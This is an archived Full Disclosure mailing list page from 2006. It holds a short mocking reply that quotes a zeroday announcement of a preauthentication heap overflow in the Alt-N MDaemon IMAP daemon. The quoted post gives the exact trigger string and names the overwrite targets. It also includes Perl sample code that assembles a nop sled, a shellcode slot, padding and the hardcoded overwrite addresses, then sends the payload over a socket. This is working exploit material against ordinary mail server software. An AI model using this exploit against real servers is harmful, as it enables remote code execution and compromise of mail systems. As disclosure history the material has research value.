Full Disclosure mailing list archives

Re: zeroday warez MDAEMON LATEST VERSION PREAUTH REMOTE ROOT HOLE zeroday warez

From: "ad () heapoverflow com" <ad () heapoverflow com>
Date: Sun, 28 May 2006 15:39:37 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
 
if this is about "how to ruin a discovery" do you excel dude, keep it up.


kcope wrote:

MDAEMON LATEST VERSION PREAUTH *REMOTE ROOT HOLE*

zeroday discovered by kcope kingcope[at]gmx.net !!!
shouts to alex,wY!,bogus,revoguard,adizeone

Description
There's a remotely exploitable preauthentication hole in Alt-N MDaemon.
It is a Heap Overflow in the IMAP Daemon.
It can be triggered by sending the following attack string:
a001 "[X]\r\n
Look specifically at the " it is important :)
[X] consists of f.e. 99555 Z's to reach the 4 byte overwrite.
Now one can use the 4 byte overwrite in some PEB pointer overwrite to
open a remote shell. UnhandledExceptionFilter is also possible I think.
No exploit is delivered at this time, figure it out yourself (use the

PEB Lock) :)


Sample code:
$where = "\x4c\x14\xed\x77"; # UnhandledExceptionFilter 77ED144C
#$where = "\x20\xf0\xfd\x7f"; # PEB Lock Pointer 7FFDF000
$what = "\x3d\xb9\x82\x02"; # JMP EDX 03bfcb9A

$nops = "A" x 100;
$a = $nops . $shellcode . ("Z" x

(0x2006-length($shellcode)-length($nops))) . $what . $where . ("Z" x
(0x184AC - 0x200A - 12));

print $sock "a001 \"$a\r\n";
close($sock);

Best Regards,
kcope

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


__________ NOD32 1.1562 (20060527) Information __________

This message was checked by NOD32 antivirus system.
http://www.eset.com


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.1 (MingW32)
 
iD8DBQFEeagZFJS99fNfR+YRAtC0AKCqXObGub6D/HKJLWnA/q9pHBECbACcDhC+
DA09IzPTR128Wi+tYU6gohg=
=TBDv
-----END PGP SIGNATURE-----

Attachment: ad.vcf
Description:

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

*zeroday warez* MDAEMON LATEST VERSION PREAUTH REMOTE ROOT HOLE *zeroday warez* kcope (May 28)
- Re: *zeroday warez* MDAEMON LATEST VERSION PREAUTH REMOTE ROOT HOLE *zeroday warez* ad () heapoverflow com (May 28)
  - Re: *zeroday warez* MDAEMON LATEST VERSION PREAUTH REMOTE ROOT HOLE *zeroday warez* . Solo (May 29)
    - Re: *zeroday warez* MDAEMON LATEST VERSION PREAUTH REMOTE ROOT HOLE *zeroday warez* . Solo (May 29)
    - Re: *zeroday warez* MDAEMON LATEST VERSION PREAUTH REMOTE ROOT HOLE *zeroday warez* kcope (May 29)

Full Disclosure mailing list archives

Re: *zeroday warez* MDAEMON LATEST VERSION PREAUTH REMOTE ROOT HOLE *zeroday warez*

Current thread:

Re: zeroday warez MDAEMON LATEST VERSION PREAUTH REMOTE ROOT HOLE zeroday warez